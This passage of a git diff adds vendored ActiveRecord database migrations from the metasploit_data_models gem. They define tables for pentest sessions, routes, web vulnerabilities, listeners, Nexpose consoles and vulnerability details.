+ t.string :local_path
+
+ t.timestamp :created_at
+ end
+
+ #
+ # Migrate session data from events table
+ #
+
+ close_events = Event.find_all_by_name("session_close")
+ open_events = Event.find_all_by_name("session_open")
+
+ command_events = Event.find_all_by_name("session_command")
+ output_events = Event.find_all_by_name("session_output")
+ upload_events = Event.find_all_by_name("session_upload")
+ download_events = Event.find_all_by_name("session_download")
+
+ open_events.each do |o|
+ c = close_events.find { |e| e.info[:session_uuid] == o.info[:session_uuid] }
+
+ s = Session.new(
+ :host_id => o.host_id,
+ :stype => o.info[:session_type],
+ :via_exploit => o.info[:via_exploit],
+ :via_payload => o.info[:via_payload],
+ :datastore => o.info[:datastore],
+ :opened_at => o.created_at
+ )
+
+ if c
+ s.closed_at = c.created_at
+ s.desc = c.info[:session_info]
+ else
+ # couldn't find the corresponding close event
+ s.closed_at = s.opened_at
+ s.desc = "?"
+ end
+
+ uuid = o.info[:session_uuid]
+
+ command_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "command", :command => e.info[:command] )
+ end
+
+ output_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "output", :output => e.info[:output] )
+ end
+
+ upload_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "upload", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] )
+ end
+
+ download_events.select { |e| e.info[:session_uuid] == uuid }.each do |e|
+ s.events.build(:created_at => e.created_at, :etype => "download", :local_path => e.info[:local_path], :remote_path => e.info[:remote_path] )
+ end
+
+ s.events.sort_by(&:created_at)
+
+ s.save!
+ end
+ end
+
+ def self.down
+ drop_table :sessions
+ drop_table :session_events
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb
new file mode 100755
index 0000000000..7c0e57c505
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb
@@ -0,0 +1,11 @@
+class AddLocalIdToSessionTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :sessions, :local_id, :integer
+ end
+
+ def self.down
+ remove_column :sessions, :local_id
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb
new file mode 100755
index 0000000000..1eb104f9bf
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb
@@ -0,0 +1,18 @@
+class AddRoutesTable < ActiveRecord::Migration
+
+ def self.up
+ create_table :routes do |t|
+ t.integer :session_id
+ t.string :subnet
+ t.string :netmask
+ end
+
+ remove_column :sessions, :routes
+ end
+
+ def self.down
+ drop_table :routes
+
+ add_column :sessions, :routes, :string
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb
new file mode 100755
index 0000000000..4fa3428ad1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb
@@ -0,0 +1,72 @@
+class ConvertBinary < ActiveRecord::Migration
+
+
+ class WebPage < ActiveRecord::Base
+ serialize :headers
+ end
+
+ class WebVuln < ActiveRecord::Base
+ serialize :params
+ end
+
+ def bfilter(str)
+ str = str.to_s
+ str.encoding = 'binary' if str.respond_to?('encoding=')
+ str.gsub(/[\x00\x7f-\xff]/, '')
+ end
+
+ def self.up
+ rename_column :web_pages, :body, :body_text
+ rename_column :web_pages, :request, :request_text
+ rename_column :web_vulns, :request, :request_text
+ rename_column :web_vulns, :proof, :proof_text
+
+ add_column :web_pages, :body, :binary
+ add_column :web_pages, :request, :binary
+ add_column :web_vulns, :request, :binary
+ add_column :web_vulns, :proof, :binary
+
+ WebPage.find(:all).each { |r| r.body = r.body_text; r.save! }
+ WebPage.find(:all).each { |r| r.request = r.request_text; r.save! }
+ WebVuln.find(:all).each { |r| r.proof = r.proof_text; r.save! }
+ WebVuln.find(:all).each { |r| r.request = r.request_text; r.save! }
+
+ remove_column :web_pages, :body_text
+ remove_column :web_pages, :request_text
+ remove_column :web_vulns, :request_text
+ remove_column :web_vulns, :proof_text
+
+ WebPage.connection.schema_cache.clear!
+ WebPage.reset_column_information
+ WebVuln.connection.schema_cache.clear!
+ WebVuln.reset_column_information
+ end
+
+ def self.down
+
+ rename_column :web_pages, :body, :body_binary
+ rename_column :web_pages, :request, :request_binary
+ rename_column :web_vulns, :request, :request_binary
+ rename_column :web_vulns, :proof, :proof_binary
+
+ add_column :web_pages, :body, :text
+ add_column :web_pages, :request, :text
+ add_column :web_vulns, :request, :text
+ add_column :web_vulns, :proof, :text
+
+ WebPage.find(:all).each { |r| r.body = bfilter(r.body_binary); r.save! }
+ WebPage.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
+ WebVuln.find(:all).each { |r| r.proof = bfilter(r.proof_binary); r.save! }
+ WebVuln.find(:all).each { |r| r.request = bfilter(r.request_binary); r.save! }
+
+ remove_column :web_pages, :body_binary
+ remove_column :web_pages, :request_binary
+ remove_column :web_vulns, :request_binary
+ remove_column :web_vulns, :proof_binary
+
+ WebPage.connection.schema_cache.clear!
+ WebPage.reset_column_information
+ WebVuln.connection.schema_cache.clear!
+ WebVuln.reset_column_information
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb
new file mode 100755
index 0000000000..48380af6ae
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb
@@ -0,0 +1,8 @@
+class AddLastSeenToSessions < ActiveRecord::Migration
+ def self.up
+ add_column :sessions, :last_seen, :timestamp
+ end
+ def self.down
+ remove_column :sessions, :last_seen
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb
new file mode 100755
index 0000000000..7c55105fe8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb
@@ -0,0 +1,31 @@
+class TrackSuccessfulExploits < ActiveRecord::Migration
+
+
+ class ExploitedHost < ActiveRecord::Base
+ end
+
+ class Vuln < ActiveRecord::Base
+ end
+
+ def self.up
+ add_column :vulns, :exploited_at, :timestamp
+
+ # Migrate existing exploited_hosts entries
+
+ ExploitedHost.find(:all).select {|x| x.name}.each do |exploited_host|
+ next unless(exploited_host.name =~ /^(exploit|auxiliary)\//)
+ vulns = Vuln.find_all_by_name_and_host_id(exploited_host.name, exploited_host.host_id)
+ next if vulns.empty?
+ vulns.each do |vuln|
+ vuln.exploited_at = exploited_host.updated_at
+ vuln.save
+ end
+ end
+
+ end
+
+ def self.down
+ remove_column :vulns, :exploited_at
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
new file mode 100755
index 0000000000..e1b8955b7f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb
@@ -0,0 +1,26 @@
+class RenameAndPruneNessusVulns < ActiveRecord::Migration
+
+ class Vuln < ActiveRecord::Base
+ end
+
+ # No table changes, just vuln renaming to drop the NSS id
+ # from those vulns that have it and a descriptive name.
+ def self.up
+ Vuln.find(:all).each do |v|
+ if v.name =~ /^NSS-0?\s*$/
+ v.delete
+ next
+ end
+ next unless(v.name =~ /^NSS-[0-9]+\s(.+)/)
+ new_name = $1
+ next if(new_name.nil? || new_name.strip.empty?)
+ v.name = new_name
+ v.save!
+ end
+ end
+
+ def self.down
+ say "Cannot un-rename and un-prune NSS vulns for migration 20110517160800."
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb
new file mode 100755
index 0000000000..5af2d46704
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb
@@ -0,0 +1,11 @@
+class AddTaskIdToReportsTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :reports, :task_id, :integer
+ end
+
+ def self.down
+ remove_column :reports, :task_id
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb
new file mode 100755
index 0000000000..13e6ecedd0
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb
@@ -0,0 +1,12 @@
+class AddApiKeysTable < ActiveRecord::Migration
+ def self.up
+ create_table :api_keys do |t|
+ t.text :token
+ t.timestamps
+ end
+ end
+ def self.down
+ drop_table :api_keys
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb
new file mode 100755
index 0000000000..bfb8ef6085
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb
@@ -0,0 +1,16 @@
+class AddMacrosTable < ActiveRecord::Migration
+ def self.up
+ create_table :macros do |t|
+ t.timestamps
+ t.text :owner
+ t.text :name
+ t.text :description
+ t.binary :actions
+ t.binary :prefs
+ end
+ end
+ def self.down
+ drop_table :macros
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb
new file mode 100755
index 0000000000..ee9ee21070
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110622000000_add_settings_to_tasks_table.rb
@@ -0,0 +1,12 @@
+class AddSettingsToTasksTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :tasks, :settings, :binary
+ end
+
+ def self.down
+ remove_column :tasks, :settings
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb
new file mode 100755
index 0000000000..c541be2131
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110624000001_add_listeners_table.rb
@@ -0,0 +1,19 @@
+class AddListenersTable < ActiveRecord::Migration
+ def self.up
+ create_table :listeners do |t|
+ t.timestamps
+ t.integer :workspace_id, :null => false, :default => 1
+ t.integer :task_id
+ t.boolean :enabled, :default => true
+ t.text :owner
+ t.text :payload
+ t.text :address
+ t.integer :port
+ t.binary :options
+ end
+ end
+ def self.down
+ drop_table :listeners
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb
new file mode 100755
index 0000000000..283d102105
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110625000001_add_macro_to_listeners_table.rb
@@ -0,0 +1,12 @@
+class AddMacroToListenersTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :listeners, :macro, :text
+ end
+
+ def self.down
+ remove_column :listeners, :macro
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb
new file mode 100755
index 0000000000..037af40ae1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000001_add_nexpose_consoles_table.rb
@@ -0,0 +1,21 @@
+class AddNexposeConsolesTable < ActiveRecord::Migration
+ def self.up
+ create_table :nexpose_consoles do |t|
+ t.timestamps
+ t.boolean :enabled, :default => true
+ t.text :owner
+ t.text :address
+ t.integer :port, :default => 3780
+ t.text :username
+ t.text :password
+ t.text :status
+ t.text :version
+ t.text :cert
+ t.binary :cached_sites
+ end
+ end
+ def self.down
+ drop_table :nexpose_consoles
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb
new file mode 100755
index 0000000000..9411724344
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb
@@ -0,0 +1,12 @@
+class AddNameToNexposeConsolesTable < ActiveRecord::Migration
+
+ def self.up
+ add_column :nexpose_consoles, :name, :text
+ end
+
+ def self.down
+ remove_column :nexpose_consoles, :name
+ end
+
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb
new file mode 100755
index 0000000000..c0b8831bf1
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110717000001_add_profiles_table.rb
@@ -0,0 +1,15 @@
+class AddProfilesTable < ActiveRecord::Migration
+ def self.up
+ create_table :profiles do |t|
+ t.timestamps
+ t.boolean :active, :default => true
+ t.text :name
+ t.text :owner
+ t.binary :settings
+ end
+ end
+ def self.down
+ drop_table :profiles
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb
new file mode 100755
index 0000000000..b5fce6fd8f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110727163801_expand_cred_ptype_column.rb
@@ -0,0 +1,9 @@
+class ExpandCredPtypeColumn < ActiveRecord::Migration
+ def self.up
+ change_column :creds, :ptype, :string, :limit => 256
+ end
+ def self.down
+ change_column :creds, :ptype, :string, :limit => 16
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb
new file mode 100755
index 0000000000..4085f64843
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110730000001_add_initial_indexes.rb
@@ -0,0 +1,85 @@
+class AddInitialIndexes < ActiveRecord::Migration
+ def self.up
+
+
+ add_index :hosts, :address
+ add_index :hosts, :address6
+ add_index :hosts, :name
+ add_index :hosts, :state
+ add_index :hosts, :os_name
+ add_index :hosts, :os_flavor
+ add_index :hosts, :purpose
+
+ # Removed (conditionally dropped in the next migration)
+ # add_index :hosts, :comments
+
+ add_index :services, :port
+ add_index :services, :proto
+ add_index :services, :state
+ add_index :services, :name
+
+ # Removed (conditionally dropped in the next migration)
+ # add_index :services, :info
+
+ add_index :notes, :ntype
+
+ add_index :vulns, :name
+
+ # Removed (conditionally dropped in the next migration)
+ # add_index :vulns, :info
+
+ add_index :refs, :name
+
+ add_index :web_sites, :vhost
+ add_index :web_sites, :comments
+ add_index :web_sites, :options
+
+ add_index :web_pages, :path
+ add_index :web_pages, :query
+
+ add_index :web_forms, :path
+
+ add_index :web_vulns, :path
+ add_index :web_vulns, :method
+ add_index :web_vulns, :name
+ end
+
+ def self.down
+
+ remove_index :hosts, :address
+ remove_index :hosts, :address6
+ remove_index :hosts, :name
+ remove_index :hosts, :state
+ remove_index :hosts, :os_name
+ remove_index :hosts, :os_flavor
+ remove_index :hosts, :purpose
+ remove_index :hosts, :comments
+
+ remove_index :services, :port
+ remove_index :services, :proto
+ remove_index :services, :state
+ remove_index :services, :name
+ remove_index :services, :info
+
+ remove_index :notes, :ntype
+
+ remove_index :vulns, :name
+ remove_index :vulns, :info
+
+ remove_index :refs, :name
+
+ remove_index :web_sites, :vhost
+ remove_index :web_sites, :comments
+ remove_index :web_sites, :options
+
+ remove_index :web_pages, :path
+ remove_index :web_pages, :query
+
+ remove_index :web_forms, :path
+
+ remove_index :web_vulns, :path
+ remove_index :web_vulns, :method
+ remove_index :web_vulns, :name
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb
new file mode 100755
index 0000000000..54b681f273
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110812000001_prune_indexes.rb
@@ -0,0 +1,23 @@
+class PruneIndexes < ActiveRecord::Migration
+ def self.up
+
+ if indexes(:hosts).map{|x| x.columns }.flatten.include?("comments")
+ remove_index :hosts, :comments
+ end
+
+ if indexes(:services).map{|x| x.columns }.flatten.include?("info")
+ remove_index :services, :info
+ end
+
+ if indexes(:vulns).map{|x| x.columns }.flatten.include?("info")
+ remove_index :vulns, :info
+ end
+ end
+
+ def self.down
+ add_index :hosts, :comments
+ add_index :services, :info
+ add_index :vulns, :info
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb
new file mode 100755
index 0000000000..4e77303fa0
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110922000000_expand_notes.rb
@@ -0,0 +1,9 @@
+class ExpandNotes < ActiveRecord::Migration
+ def self.up
+ change_column :notes, :data, :text
+ end
+ def self.down
+ change_column :notes, :data, :string, :limit => 65536
+ end
+end
+
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb
new file mode 100755
index 0000000000..24f16d642f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110928101300_add_mod_ref_table.rb
@@ -0,0 +1,17 @@ +# Probably temporary, a spot to stash module names and their associated refs +# Don't count on it being populated at any given moment. +class AddModRefTable < ActiveRecord::Migration + + def self.up + create_table :mod_refs do |t| + t.string :module, :limit => 1024 + t.string :mtype, :limit => 128 + t.text :ref + end + end + + def self.down + drop_table :mod_refs + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb new file mode 100755 index 0000000000..f0c54fed98 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111011110000_add_display_name_to_reports_table.rb @@ -0,0 +1,24 @@ +class AddDisplayNameToReportsTable < ActiveRecord::Migration + + class Report < ActiveRecord::Base + end + + def self.up + + add_column :reports, :name, :string, :limit => 63 + + # Migrate to have a default name. + + Report.find(:all).each do |report| + rtype = report.rtype.to_s =~ /^([A-Z0-9]+)\x2d/i ? $1 : "AUDIT" + default_name = rtype[0,57].downcase.capitalize + "-" + report.id.to_s[0,5] + report.name = default_name + report.save + end + end + + def self.down + remove_column :reports, :name + end + +end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb new file mode 100755 index 0000000000..6e86654bc5 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111203000000_inet_columns.rb 
@@ -0,0 +1,13 @@
+class InetColumns < ActiveRecord::Migration
+
+ def self.up
+ change_column :hosts, :address, 'INET using address::INET'
+ remove_column :hosts, :address6
+ end
+
+ def self.down
+ change_column :hosts, :address, :text
+ add_column :hosts, :address6, :text
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb
new file mode 100755
index 0000000000..56adf64625
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111204000000_more_inet_columns.rb
@@ -0,0 +1,17 @@
+class MoreInetColumns < ActiveRecord::Migration
+
+ def self.up
+ change_column :wmap_requests, :address, 'INET using address::INET'
+ remove_column :wmap_requests, :address6
+ change_column :wmap_targets, :address, 'INET using address::INET'
+ remove_column :wmap_targets, :address6
+ end
+
+ def self.down
+ change_column :wmap_requests, :address, :string, :limit => 16
+ add_column :wmap_requests, :address6, :string, :limit => 255
+ change_column :wmap_targets, :address, :string, :limit => 16
+ add_column :wmap_targets, :address6, :string, :limit => 255
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb
new file mode 100755
index 0000000000..2bbe8f9f77
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20111210000000_add_scope_to_hosts.rb
@@ -0,0 +1,9 @@
+class AddScopeToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :scope, :text
+ end
+
+ def self.down
+ remove_column :hosts, :scope
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb
new file mode 100755
index 0000000000..5e9833d884
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120126110000_add_virtual_host_to_hosts.rb
@@ -0,0 +1,9 @@
+class AddVirtualHostToHosts < ActiveRecord::Migration
+ def self.up
+ add_column :hosts, :virtual_host, :text
+ end
+
+ def self.down
+ remove_column :hosts, :viritual_host
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb
new file mode 100755
index 0000000000..75003d6d36
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120411173220_rename_workspace_members.rb
@@ -0,0 +1,9 @@
+class RenameWorkspaceMembers < ActiveRecord::Migration
+ def up
+ rename_table :project_members, :workspace_members
+ end
+
+ def down
+ rename_table :workspace_members, :project_members
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb
new file mode 100755
index 0000000000..fcd2f9e0ca
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120601152442_add_counter_caches_to_hosts.rb
@@ -0,0 +1,21 @@
+class AddCounterCachesToHosts < ActiveRecord::Migration
+
+ def self.up
+ add_column :hosts, :note_count, :integer, :default => 0
+ add_column :hosts, :vuln_count, :integer, :default => 0
+ add_column :hosts, :service_count, :integer, :default => 0
+
+ Mdm::Host.reset_column_information
+ Mdm::Host.all.each do |h|
+ Mdm::Host.reset_counters h.id, :notes
+ Mdm::Host.reset_counters h.id, :vulns
+ Mdm::Host.reset_counters h.id, :services
+ end
+ end
+
+ def self.down
+ remove_column :hosts, :note_count
+ remove_column :hosts, :vuln_count
+ remove_column :hosts, :service_count
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb
new file mode 100755
index 0000000000..0f946da39c
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000000_add_vuln_details.rb
@@ -0,0 +1,34 @@
+class AddVulnDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_details do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.float :cvss_score # 0.0 to 10.0
+ t.string :cvss_vector # Ex: (AV:N/AC:L/Au:N/C:C/I:C/A:C)(AV:N/AC:L/Au:N/C:C/I:C/A:C)
+
+ t.string :title # Short identifier
+ t.text :description # Plain text or HTML (trusted)
+ t.text :solution # Plain text or HTML (trusted)
+ t.binary :proof # Should be UTF-8, but may not be, sanitize on output
+ # Technically this duplicates vuln.info, but that field
+ # is poorly managed / handled today. Eventually we will
+ # replace vuln.info
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ t.string :nx_vuln_id # 'jre-java-update-flaw'
+ t.float :nx_severity # 0-10
+ t.float :nx_pci_severity # 0-10
+ t.timestamp :nx_published # Normalized from "20081205T000000000"
+ t.timestamp :nx_added # Normalized from "20081205T000000000"
+ t.timestamp :nx_modified # Normalized from "20081205T000000000"
+ t.text :nx_tags # Comma separated
+
+ end
+ end
+
+ def self.down
+ drop_table :vuln_details
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb
new file mode 100755
index 0000000000..36e70892fa
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000001_add_host_details.rb
@@ -0,0 +1,16 @@
+class AddHostDetails < ActiveRecord::Migration
+
+ def self.up
+ create_table :host_details do |t|
+ t.integer :host_id # Host table reference
+
+ # Nexpose-specific fields
+ t.integer :nx_console_id # NexposeConsole table reference
+ t.integer :nx_device_id # Reference from the Nexpose side
+ end
+ end
+
+ def self.down
+ drop_table :host_details
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb
new file mode 100755
index 0000000000..bd240ecdc5
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000002_expand_details.rb
@@ -0,0 +1,16 @@
+class ExpandDetails < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_details, :nx_vuln_status, :text
+ add_column :vuln_details, :nx_proof_key, :text
+ add_column :vuln_details, :src, :string
+ add_column :host_details, :src, :string
+ end
+
+ def self.down
+ remove_column :vuln_details, :nx_vuln_status
+ remove_column :vuln_details, :nx_proof_key
+ remove_column :vuln_details, :src
+ remove_column :host_details, :src
+ end
+end
